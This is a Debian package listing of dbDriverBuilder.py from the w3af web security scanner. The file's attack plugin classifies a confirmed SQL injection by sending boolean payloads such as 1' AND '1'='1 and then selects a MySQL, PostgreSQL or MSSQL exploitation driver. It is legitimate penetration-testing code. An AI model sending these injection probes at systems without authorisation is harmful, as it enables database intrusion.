File: dbDriverBuilder.py

package info (click to toggle)
w3af 1.0-rc3svn3489-1
  • links: PTS
  • area: main
  • in suites: jessie, jessie-kfreebsd, squeeze, wheezy
  • size: 59,908 kB
  • ctags: 16,916
  • sloc: python: 136,990; xml: 63,472; sh: 153; ruby: 94; makefile: 40; asm: 35; jsp: 32; perl: 18; php: 5
file content (84 lines) | stat: -rw-r--r-- 3,124 bytes parent folder | download 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
 
'''
dbDriverBuilder.py

Copyright 2006 Andres Riancho

This file is part of w3af, w3af.sourceforge.net .

w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.

w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA

'''

import core.controllers.outputManager as om

from plugins.attack.db.mysqlmap import MySQLMap as mysqlmap
from plugins.attack.db.postgresqlmap import PostgreSQLMap as postgresqlmap
from plugins.attack.db.mssqlservermap import MSSQLServerMap as mssqlservermap
#from plugins.attack.db.mysqlmap import db2 as db2

from core.controllers.w3afException import w3afException

class dbDriverBuilder:
    '''
    This class is a builder for database drivers.
    
    @author: Andres Riancho ( andres.riancho@gmail.com )
    '''
    def __init__( self , urlOpener, cmpFunction ):
        '''
        cmpFunction is the function to be used to compare two strings.
        '''
        self._urlOpener = urlOpener
        self._cmpFunction = cmpFunction
    
    def _getType( self, vuln ):
        '''
        Determine how to escape the sql injection
        '''
        exploitDc = vuln.getDc()
        exploitDc[ vuln.getVar() ] = "'z'z'z'"
        functionReference = getattr( self._urlOpener , vuln.getMethod() )
        errorResponse = functionReference( vuln.getURL(), str(exploitDc) )

        for escape, type in [ ('\'','stringsingle') , ('"','stringdouble'), (' ','numeric')]:
            exploitDc[ vuln.getVar() ] = '1' + escape + ' AND ' + escape + '1' + escape + '=' + escape + '1'
            response = functionReference( vuln.getURL(), str(exploitDc) )
            if response.getBody() != errorResponse.getBody():
                vuln['type'] = type
                om.out.debug('[INFO] The injection type is: ' + type )
                return vuln
                
        om.out.error('Could not find SQL injection type.')
        return None
                
    def getDriverForVuln( self, vuln ):
        '''
        @return: A database driver for the vuln passed as parameter.
        '''
        if 'type' not in vuln:
            vuln = self._getType( vuln )
            if vuln == None:
                return None
        
        driverList = []
        driverList.append( mysqlmap( self._urlOpener, self._cmpFunction, vuln ) )
        driverList.append( postgresqlmap( self._urlOpener, self._cmpFunction, vuln ) )
        driverList.append( mssqlservermap( self._urlOpener, self._cmpFunction,  vuln ) )
        #driverList.append( db2( self._urlOpener, vuln ) )

        for driver in driverList:
            if driver.checkDbms():
                return driver
    
        return None